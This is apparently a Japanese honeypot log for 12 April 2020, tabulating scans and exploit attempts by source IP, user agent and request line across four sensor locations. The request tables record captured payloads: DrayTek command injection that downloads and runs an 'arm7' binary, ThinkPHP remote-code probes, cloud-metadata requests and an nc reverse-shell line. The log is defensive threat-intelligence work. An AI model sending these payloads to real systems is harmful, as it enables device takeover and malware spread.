ハニーポット(仮) 観測記録 2020/04/12分です。
特徴
Location:JP
Adobe ColdFusionの脆弱性を狙うアクセス
DrayTek製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
polaris botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:UK
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Gh0stRATのような動き
を確認しました。
Location:SG
DrayTek製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
を確認しました。
他
アクセス数推移
JP:総アクセス数:95 (前日比:-181)
US:総アクセス数:22 (前日比:0)
UK:総アクセス数:35 (前日比:-1)
SG:総アクセス数:20 (前日比:-23)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
6 | 5.101.0.209 | Russia |
1 | 24.217.116.164 | United States |
34 | 44.225.84.206 | United States |
10 | 49.7.112.99 | China |
1 | 80.82.78.104 | Netherlands |
1 | 92.222.24.46 | France |
1 | 94.191.113.28 | China |
10 | 111.229.1.215 | China |
1 | 118.70.190.137 | Vietnam |
3 | 140.143.16.158 | China |
1 | 151.99.146.218 | Italy |
1 | 162.243.133.179 | United States |
2 | 185.153.199.118 | Republic of Moldova |
2 | 190.0.57.46 | Colombia |
1 | 192.241.236.131 | United States |
1 | 200.94.52.243 | Mexico |
10 | 213.136.69.132 | Germany |
9 | 223.166.32.75 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
27 | - |
14 | AWS Security Scanner |
4 | Go-http-client/1.1 |
6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
9 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
31 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 zgrab/0.x |
2 | polaris botnet |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | \x03 | ||
10 | \x16\x03\x01 | ||
10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /CFIDE/administrator/ | HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | /SQLite/main.php | HTTP/1.1 |
1 | GET | /SQLiteManager-1.2.4/main.php | HTTP/1.1 |
1 | GET | /SQlite/main.php | HTTP/1.1 |
3 | GET | /TP/html/public/index.php | HTTP/1.1 |
4 | GET | /TP/index.php | HTTP/1.1 |
5 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /agSearch/SQlite/main.php | HTTP/1.1 |
3 | GET | /elrekt.php | HTTP/1.1 |
3 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
3 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
3 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | /main.php | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
3 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /sqlite/main.php | HTTP/1.1 |
1 | GET | /sqlitemanager/main.php | HTTP/1.1 |
1 | GET | /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php | HTTP/1.1 |
4 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
2 | POST | /boaform/admin/formPing | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
4 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
3 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
4 | 5.101.0.209 | Russia |
1 | 23.95.0.119 | United States |
1 | 80.82.78.104 | Netherlands |
1 | 83.39.125.147 | Spain |
1 | 83.110.104.31 | United Arab Emirates |
1 | 83.110.147.165 | United Arab Emirates |
1 | 84.108.25.20 | Israel |
7 | 122.51.244.71 | China |
1 | 141.98.81.6 | Panama |
1 | 162.243.128.170 | United States |
1 | 179.53.150.142 | Dominican Republic |
1 | 192.241.238.137 | United States |
1 | 200.125.164.46 | Trinidad and Tobago |
UserAgent一覧
件数 | UserAgent |
---|---|
5 | - |
1 | Go-http-client/1.1 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
2 | Mozilla/5.0 zgrab/0.x |
2 | XTC BOTNET |
6 | ZmEu |
1 | curl/7.67.0 |
1 | polaris botnet |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | CONNECT | smtp[.]mail[.]ru/:25 | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /incl/image_test.shtml?camnbr=%3c%21--%23exec%20cmd=%22mkfifo%20/tmp/s;nc%20-w%205%2023.95.0.119%2029312%200%3C/tmp/s | /bin/sh%3E/tmp/s%202%3E/tmp/s;rm%20/tmp/s%22%20--%3e|HTTP/1.0 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | HTTP/1.1 | |
1 | POST | /boaform/admin/formPing | HTTP/1.1 |
3 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
3 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 24.1.44.82 | United States |
1 | 31.215.102.137 | United Arab Emirates |
1 | 50.195.155.21 | United States |
1 | 66.240.205.34 | United States |
1 | 78.187.87.245 | Turkey |
1 | 80.82.78.104 | Netherlands |
1 | 85.93.20.170 | Germany |
1 | 108.238.143.30 | United States |
1 | 158.69.172.231 | Canada |
1 | 162.243.128.104 | United States |
1 | 178.54.86.119 | Ukraine |
1 | 178.219.173.3 | Ukraine |
1 | 181.120.188.152 | Paraguay |
4 | 185.142.236.34 | Netherlands |
1 | 185.153.199.118 | Republic of Moldova |
1 | 189.213.27.104 | Mexico |
1 | 190.152.144.202 | Ecuador |
1 | 192.241.237.227 | United States |
1 | 201.54.254.71 | Brazil |
11 | 223.240.80.44 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
14 | - |
2 | Go-http-client/1.1 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
1 | Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | Mozilla/5.0 zgrab/0.x |
3 | XTC BOTNET |
2 | polaris botnet |
1 | python-requests/2.19.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - | ||
1 | Gh0st\xad | ||
2 | \x03 | ||
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
2 | POST | /boaform/admin/formPing | HTTP/1.1 |
5 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//192[.]3[.]45[.]185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
4 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.39.173.31 | Italy |
1 | 80.82.78.104 | Netherlands |
1 | 85.93.20.170 | Germany |
1 | 96.73.71.5 | United States |
10 | 122.224.131.186 | China |
1 | 154.70.134.71 | South Africa |
1 | 162.243.129.134 | United States |
3 | 185.153.199.118 | Republic of Moldova |
1 | 202.184.112.35 | Malaysia |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
2 | Go-http-client/1.1 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 zgrab/0.x |
2 | XTC |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
4 | \x03 | ||
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
3 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
2 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |